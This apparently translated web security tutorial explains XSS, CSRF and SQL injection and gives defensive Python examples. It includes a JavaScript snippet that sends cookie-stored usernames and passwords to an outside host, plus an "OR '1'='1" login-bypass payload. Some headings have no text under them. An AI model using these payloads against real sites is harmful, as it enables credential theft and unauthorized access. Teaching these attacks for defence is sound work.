Web security and protection (XSS, CSRF, SQL injection)

XSS attack principle

XSS (cross-site scripting) attacks are attacks in which an attacker inserts malicious HTML tags or JavaScript code into a web page.

For example:
①The attacker places a seemingly safe link in the forum, deceives the user into clicking on it, and then steals the user’s private information in the cookie;
② Or the attacker adds a malicious form to the forum, and when the user submits the form, the information is sent to the attacker’s server instead of the site that the user originally thought they trusted.

Allow users to leave comments as follows

Because the page completely trusts user input, a user with ulterior motives can instead enter something like this:

In this way, no matter who visits the page, their console prints “Hey you are a fool fish!”. That is only a malicious little joke, but not everyone is so harmless: some users will use this vulnerability to steal other users’ information, trick people into opening malicious websites, or get them to download malicious programs. Let’s look at the simplest example.

Using XSS to steal usernames and passwords
This example is very simple and could hardly attack any real website; it is only meant to show the principle. Many login pages offer to remember the username and password so the user can log in more easily next time, and some websites record the username and password in the cookie in plain text. A malicious user registers an account, logs in, and uses a simple tool to inspect the names of the cookie fields. If the website also has an XSS vulnerability, the attacker can then use JSONP to obtain other users’ usernames and passwords.

A malicious user would enter this

Let’s take a look at what’s hidden in http://test.com/hack.js

// reads the plain-text credentials the site stored in its cookie and sends them to the attacker's server via a script tag (JSONP-style)
var username=CookieHelper.getCookie('username').value;
var password=CookieHelper.getCookie('password').value;
var script =document.createElement('script');
script.src='http://test.com/index.php?username=' + username + '&password=' + password;
document.body.appendChild(script);

A few lines of JavaScript read the username and password out of the cookie and use a JSONP-style script tag to send them to http://test.com/index.php

Hazards:

1. Steal user information, such as machine login accounts, user online banking accounts, and various administrator accounts

2. Control corporate data, including the ability to read, tamper with, add, and delete corporate sensitive data

3. Steal important company information with commercial value

4. Illegal transfers

5. Force the sending of emails

6. Control the victim’s machine to launch attacks on other websites

XSS attack prevention methods

First of all, the code must carefully check the length of every place that accepts user input and every variable derived from it, and filter characters such as “<”, “>”, “;” and “‘”;
Secondly, any content must be encoded before it is written to the page, so that user input cannot accidentally turn into a live HTML tag. If this level is done well, at least more than half of XSS attacks can be blocked.

First, avoid disclosing user privacy directly in cookies, such as email, password, etc.

Secondly, reduce the risk of cookie leakage by binding the cookie to the system IP. The cookie obtained by the attacker has no actual value and cannot be replayed.

Try to use POST instead of GET to submit the form
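An added example (not the article’s own code) of the second rule, output encoding, applied to the comment page: the unsafe and the encoded rendering of constructed sample comments, plus an illustrative session cookie header. html.escape and the HttpOnly/Secure/SameSite cookie attributes are standard Python and HTTP facilities; the cookie attributes go one step beyond the page’s own list of measures.

```python
import html

# Constructed sample comments for the demo (not from the article): one harmless,
# one carrying a script tag, one trying to break out of an HTML attribute.
SAMPLE_COMMENTS = [
    "Nice post, thanks!",
    "<script>console.log('Hey you are a fool fish!')</script>",
    '" onmouseover="alert(1)',
]


def render_comment_unsafe(comment: str) -> str:
    # The vulnerable pattern: user input is written into the page as-is, so a
    # tag inside the comment becomes live markup for every visitor.
    return '<div class="comment">' + comment + "</div>"


def render_comment_encoded(comment: str) -> str:
    # Encode before writing to the page: <, >, &, " and ' become entities, so
    # the browser displays the text instead of executing it.
    return '<div class="comment">' + html.escape(comment, quote=True) + "</div>"


def render_attribute_encoded(comment: str) -> str:
    # The same rule inside an attribute; quote=True is what closes that hole.
    return '<input value="' + html.escape(comment, quote=True) + '">'


def contains_live_tag(rendered: str, tag: str = "script") -> bool:
    # Crude check for the demo: did a literal '<script' survive into the output?
    return f"<{tag}" in rendered.lower()


def session_cookie_header(session_id: str) -> str:
    # Keep only an opaque session id in the cookie, never the password itself,
    # and mark it HttpOnly so page scripts (like hack.js above) cannot read it.
    # HttpOnly/Secure/SameSite are standard cookie attributes, added here beyond
    # the article's own list of measures.
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    for c in SAMPLE_COMMENTS:
        print(render_comment_unsafe(c))
        print(render_comment_encoded(c))
    print(session_cookie_header("opaque-id-123"))
```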

The difference between XSS attacks and CSRF attacks (cross-site request forgery)
XSS is to obtain information, and there is no need to know the codes and data packets of other user pages in advance. CSRF is to complete specified actions on behalf of the user and needs to know the codes and data packets of other user pages.

To complete a CSRF attack, the victim must complete two steps in sequence:

Log in to trusted website A and generate cookies locally.

Access dangerous website B without logging out of A.

CSRF attack

Principle:
CSRF (Cross Site Request Forgery), cross-site request forgery, is a common web attack. In the CSRF attack process the victim user logs into website A, enters personal information, and the browser saves the cookie generated by A’s server locally. The user then clicks a malicious link built by the attacker and lands on website B; website B makes the browser send a request to website A, and the browser attaches the user’s cookie for A to that request. Website A is thus given the illusion that the user performed the action themselves, and it carries out a series of operations on the user’s behalf, a common one being a transfer.

Example:
1. A website user, Bob, may be browsing a chat forum where another user, Alice, has just posted a picture message containing a link to Bob’s bank. Imagine that Alice writes the URL that submits a withdrawal form on Bob’s bank site and uses that URL as the image src. If Bob’s bank keeps his authorization information in a cookie, and that cookie has not expired, then when Bob’s browser tries to load the image it submits the withdrawal form together with his cookie, authorizing the transaction without Bob’s consent.

Hazards:
A web application that performs actions on the basis of a trusted input form and an authenticated user, without requiring separate authorization for specific sensitive actions, is exposed. A user who is authenticated through a cookie stored in their browser can be made to send an HTTP request to the site that trusts them, in complete ignorance, and the site then performs actions the user never intended.

Prevention:

1. Verification code.
During the interaction between the application and the user, especially in core steps such as account transactions, the user is forced to enter a verification code to complete the final request. Under normal circumstances a captcha is good enough to contain a CSRF attack. However, verification codes degrade the user experience, and a website cannot add them to every operation, so they can only serve as an auxiliary measure applied at key business points.

2. Anti CSRF Token.
The current relatively complete solution is the Anti-CSRF-Token: when a request is sent, a randomly generated token is added to the HTTP request as a parameter, and an interceptor on the server verifies it. The server reads the token value from the cookie of the browser’s current domain and compares it with the token in the request.
Only if the token in the cookie and the token in the request both exist and are equal is the request considered legitimate.

CSRF Defense
There are many ways to implement CSRF defense on the server side, but the general idea is the same: add a pseudo-random number to the client page that the server can later check.
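An added example (not the article’s own code) of the Anti-CSRF-Token check described above, implemented in Python as a double-submit cookie: the server issues a random token, the legitimate form echoes it back, and the interceptor compares the cookie copy with the request copy. The session cookie value, the form fields and the transfer endpoint are constructed for the demo.

```python
import hmac
import secrets


def issue_csrf_token() -> str:
    # Pseudo-random value the server stores in a cookie for its own domain and
    # also embeds in the page it serves.
    return secrets.token_hex(32)


def build_transfer_form(token: str, to: str, amount: int) -> dict:
    # The legitimate page on site A embeds the token as a hidden field. A page
    # on site B cannot read site A's cookie, so it cannot copy this value.
    return {"to": to, "amount": str(amount), "csrf_token": token}


def csrf_request_is_valid(cookies: dict, form: dict) -> bool:
    # Server-side interceptor: both copies must exist and match. The browser
    # attaches the cookie automatically, so the form field is the real proof.
    cookie_token = cookies.get("csrf_token")
    form_token = form.get("csrf_token")
    if not cookie_token or not form_token:
        return False
    return hmac.compare_digest(cookie_token, form_token)  # constant-time compare


def handle_transfer(cookies: dict, form: dict) -> str:
    # Simplified (constructed) transfer endpoint: reject before any state change.
    if not csrf_request_is_valid(cookies, form):
        return "rejected: missing or mismatched CSRF token"
    return f"transferred {form['amount']} to {form['to']}"


def demo() -> tuple:
    # Constructed browser state: session cookie plus the token site A issued.
    token = issue_csrf_token()
    browser_cookies = {"session": "s3ss10n", "csrf_token": token}
    # Legitimate request from site A's own form.
    legit = handle_transfer(browser_cookies, build_transfer_form(token, "alice", 100))
    # Forged request from site B: the browser still sends A's cookies, but the
    # attacker-built form carries no token, or at best a guessed one.
    forged = handle_transfer(browser_cookies, {"to": "mallory", "amount": "100"})
    guessed = handle_transfer(browser_cookies, build_transfer_form("0" * 64, "mallory", 100))
    return legit, forged, guessed


if __name__ == "__main__":
    for line in demo():
        print(line)
```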

How to pass verification code

SQL injection attack

Principle:
SQL injection: when an application passes SQL (Structured Query Language) to its backend database, an attacker inserts SQL commands into a submitted web form, or into the query string of a domain name or page request, and ultimately tricks the server into executing malicious SQL commands.

Example:
The SQL query code for login verification of a website is:

strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '" + passWord + "');"
Filling in maliciously
userName = "1' OR '1'='1";
and
passWord = "1' OR '1'='1";
will cause the original SQL string to become
strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');"
That is to say, the SQL command actually run is equivalent to
strSQL = "SELECT * FROM users;"

So anyone can log in to the website without an account or password, which is why SQL injection is commonly known as the hackers’ fill-in-the-blank game.
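As an added example (not the article’s own code), the login query above reproduced in Python against a constructed in-memory SQLite table, next to the parameterized form that the summary below recommends; the table, the stored account and the use of the page’s payload are all constructed for the demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed in-memory users table. The plain-text pw column mirrors the
    # article's query; storing passwords this way is itself one of the things
    # the summary tells you not to do.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, user_name: str, pass_word: str) -> bool:
    # The article's dynamic string assembly, reproduced as-is: whatever the user
    # types is spliced into the SQL text, so quotes in the input become syntax.
    str_sql = ("SELECT * FROM users WHERE (name = '" + user_name
               + "') and (pw = '" + pass_word + "');")
    return conn.execute(str_sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, user_name: str, pass_word: str) -> bool:
    # Parameterized query: the driver sends the values separately from the SQL
    # text, so the same input is compared as a literal string and never parsed.
    row = conn.execute(
        "SELECT * FROM users WHERE name = ? AND pw = ?", (user_name, pass_word)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    payload = "1' OR '1'='1"  # the fill-in-the-blank value from the article
    print("vulnerable, real creds:", login_vulnerable(db, "admin", "correct-horse"))
    print("vulnerable, payload:   ", login_vulnerable(db, payload, payload))
    print("parameterized, payload:", login_parameterized(db, payload, payload))
```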

Hazards:
Get administrator rights

Prevention:

1. Add blacklist or whitelist verification
Whitelist validation generally refers to checking whether user input conforms to the expected type, length, value range, or other format standards. Blacklist verification means that if the user input contains obvious malicious content, the user request will be rejected. When using whitelist verification, it is generally combined with blacklist verification.

2. Security testing
Continue to carry out security inspections once the project is complete.

3. Prevent the leakage of sensitive system information
Strictly control access rights to data tables and try to limit unnecessary user access rights.

Summary:

SQL injection principle
By inserting SQL commands into Web form submissions or entering domain names or query strings for page requests, it ultimately deceives the server into executing malicious SQL commands.

SQL injection prevention

1. Never trust the user’s input. Verify it, for example with regular expressions, by limiting its length, or by escaping single quotes and the double hyphen “--”.

2. Never use dynamic assembly of SQL. You can use parameterized SQL or directly use stored procedures for data query and access.

3. Never use a database connection with administrator privileges. Use a separate database connection with limited privileges for each application.

4. Do not store confidential information in plain text. Please encrypt or hash passwords and sensitive information.

XSS
XSS (cross-site scripting) attacks are attacks in which an attacker inserts malicious HTML tags or JavaScript code into a web page.
xss prevention

First of all, the code must carefully check the length of every place that accepts user input and every variable derived from it, and filter characters such as “<”, “>”, “;” and “‘”;
Secondly, any content must be encoded before it is written to the page, so that user input cannot accidentally turn into a live HTML tag. If this level is done well, at least more than half of XSS attacks can be blocked.

First, avoid disclosing user privacy directly in cookies, such as email, password, etc.

Secondly, reduce the risk of cookie leakage by binding the cookie to the system IP. The cookie obtained by the attacker has no actual value and cannot be replayed.

Try to use POST instead of GET to submit the form

CSRF

CSRF (Cross Site Request Forgery), cross-site request forgery, is a common web attack. In the CSRF attack process the victim user logs into website A, enters personal information, and the browser saves the cookie generated by A’s server locally. The user then clicks a malicious link built by the attacker and lands on website B, which makes the browser send a request to website A carrying the user’s cookie for A.

CSRF Defense

There are many ways to implement CSRF defense on the server side, but the general idea is the same: add a pseudo-random number to the client page that the server can later check.

How to pass verification code
